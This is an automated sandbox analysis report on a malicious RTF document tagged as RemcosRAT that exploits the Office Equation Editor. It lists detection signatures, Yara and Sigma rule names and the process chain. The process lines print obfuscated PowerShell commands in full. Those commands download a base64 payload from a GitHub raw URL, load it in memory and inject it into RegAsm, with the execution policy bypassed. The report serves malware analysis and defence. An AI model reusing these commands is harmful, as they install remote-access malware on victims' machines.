Windows Analysis Report
IpEmBW3Qw5.rtf
Overview
General Information
Sample name: | IpEmBW3Qw5.rtf (renamed because original name is a hash value) |
Original sample name: | 85bb9c92d8128e3c8cf070a813b9ba82.rtf |
Analysis ID: | 1526389 |
MD5: | 85bb9c92d8128e3c8cf070a813b9ba82 |
SHA1: | cc187bf0c745ccd7fb932faa2ee030bb404ab1eb |
SHA256: | 71e0b0884fbf2ba2f8c52e90ae66f5be792d6b1f67d4ef86226958cc0bba3970 |
Tags: | RAT, RemcosRAT, rtf, user-abuse_ch |
Infos: | |
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Bypasses PowerShell execution policy
Document exploit detected (process start blacklist hit)
Found potential equation exploit (CVE-2017-11882)
Installs new ROOT certificates
Obfuscated command line found
Office drops RTF file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Equation Editor Network Connection
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains Microsoft Equation 3.0 OLE entries
Document misses a certain OLE stream usually present in this Microsoft Office document type
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores large binary data to the registry
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w7x64
- WINWORD.EXE (PID: 3264 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
- EQNEDT32.EXE (PID: 3344 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
- wscript.exe (PID: 3500 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\newprojectwithnewthingstobecom.vBS" MD5: 979D74799EA6C8B8167869A68DF5204A)
- powershell.exe (PID: 3548 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ Codigo = ' LiAoICRFTl Y6Y29tc3BF Y1s0LDE1LD I1XS1qT0lO JycpICgoJ0 licHUnKydy bCcrJyA9IG d6Smh0dHBz OicrJy8vJy sncmF3Licr J2dpdGh1Yn VzZXInKydj b250JysnZW 50LmNvbS9O b0RldGVjJy sndCcrJ09u L05vRCcrJ2 V0ZWN0Tycr J24nKycvcm UnKydmcycr Jy9oZScrJ2 Fkcy9tJysn YWknKyduLy crJ0RlJysn dGFoTm90Jy snaC1WLicr J3R4JysndG cnKyd6Sjsg SWInKydwYm FzZTY0Jysn Q29uJysndG VudCA9Jysn IChOZXcnKy ctJysnT2Jq JysnZWN0IF MnKyd5c3Qn KydlbS5OZX QnKycuV2Vi JysnQ2xpZW 50KS5Eb3du JysnbG8nKy dhZFMnKyd0 cmluJysnZy crJyhJYnB1 cmwnKycpOy BJYnBiaW5h cnknKydDb2 50ZW50ID0g JysnWycrJ1 N5Jysnc3Rl bS5Db252ZX J0XTo6RnJv JysnbUInKy dhc2U2NCcr J1N0cmluJy snZyhJYnBi JysnYScrJ3 NlNjRDbycr J250ZW50Jy snKTsgSWJw YXNzZW1ibC crJ3kgPSAn KydbUicrJ2 UnKydmbCcr J2VjdGlvbi crJy5Bc3Nl bWJseV0nKy c6OkxvYWQo SWJwYmluYX J5JysnQycr J28nKydudG VudCk7IFtk bmxpYi5JTy 5Ib21lXTon Kyc6VkFJKH A3anR4dC5W RycrJ0ZSUi 8wMDEvMDIn KycuMDIyLj MuMjknKycx JysnLy8nKy c6cHR0aHAn Kyc3aiwnKy cgcDcnKydq ZGVzYXRpdm Fkb3A3aiwg cCcrJzdqZG UnKydzYXRp dicrJ2Fkb3 A3aiwnKycg cDcnKydqZG VzYXRpdmFk bycrJ3A3ai crJywgcDdq UmVnQXNtJy sncDdqJysn LCBwNycrJ2 pwN2oscDcn KydqcDdqKS cpLlJlcGxh Q2UoJ2d6Si csW1NUUklu Z11bQ2hhUl 0zOSkuUmVw bGFDZSgncD dqJyxbU1RS SW5nXVtDaG FSXTM0KS5S ZXBsYUNlKC dJYnAnLCck JykgKQ=='; $OWjuxd = [system.Te xt.encodin g]::UTF8.G etString([ system.Con vert]::Fro mbase64Str ing($codig o));powers hell.exe - windowstyl e hidden - executionp olicy bypa ss -NoProf ile -comma nd $OWjuxD MD5: EB32C070E658937AA9FA9F3AE629B2B8) - powershell.exe (PID: 3652 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -windowsty le hidden -execution policy byp ass -NoPro file -comm and ". ( $ ENV:comspE c[4,15,25] -jOIN'') ( ('Ibpu'+'r l'+' = gzJ https:'+'/ /'+'raw.'+ 'githubuse r'+'cont'+ 'ent.com/N oDetec'+'t '+'On/NoD' +'etectO'+ 'n'+'/re'+ 'fs'+'/he' +'ads/m'+' ai'+'n/'+' De'+'tahNo t'+'h-V.'+ 'tx'+'tg'+ 'zJ; Ib'+' pbase64'+' Con'+'tent ='+' (New '+'-'+'Obj '+'ect S'+ 'yst'+'em. Net'+'.Web '+'Client) .Down'+'lo '+'adS'+'t rin'+'g'+' (Ibpurl'+' ); Ibpbina ry'+'Conte nt = '+'[' +'Sy'+'ste m.Convert] ::Fro'+'mB '+'ase64'+ 'Strin'+'g (Ibpb'+'a' +'se64Co'+ 'ntent'+') ; Ibpassem bl'+'y = ' +'[R'+'e'+ 'fl'+'ecti on'+'.Asse mbly]'+':: Load(Ibpbi nary'+'C'+ 'o'+'ntent ); [dnlib. IO.Home]:' +':VAI(p7j txt.VG'+'F RR/001/02' +'.022.3.2 9'+'1'+'// '+':ptthp' +'7j,'+' p 7'+'jdesat ivadop7j, p'+'7jde'+ 'sativ'+'a dop7j,'+' p7'+'jdesa tivado'+'p 7j'+', p7j RegAsm'+'p 7j'+', p7' +'jp7j,p7' +'jp7j)'). ReplaCe('g zJ',[STRIn g][ChaR]39 ).ReplaCe( 'p7j',[STR Ing][ChaR] 34).ReplaC e('Ibp','$ ') )" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
- cleanup
No configs have been found
Source | Rule | Description | Author | Strings
---|---|---|---|---
 | INDICATOR_RTF_MalVer_Objects | Detects RTF documents with non-standard version and embedding one of the objects mostly observed in exploit documents. | ditekSHen | 

Source | Rule | Description | Author | Strings
---|---|---|---|---
 | INDICATOR_RTF_EXPLOIT_CVE_2017_8759_2 | Detects CVE-2017-8759 weaponized RTF documents. | ditekSHen | 

Source | Rule | Description | Author | Strings
---|---|---|---|---
 | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen | 
 | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen | 
Exploits
Source: | Author: Joe Security |
Source: | Author: Joe Security |

System Summary
Source: | Author: Florian Roth (Nextron Systems) |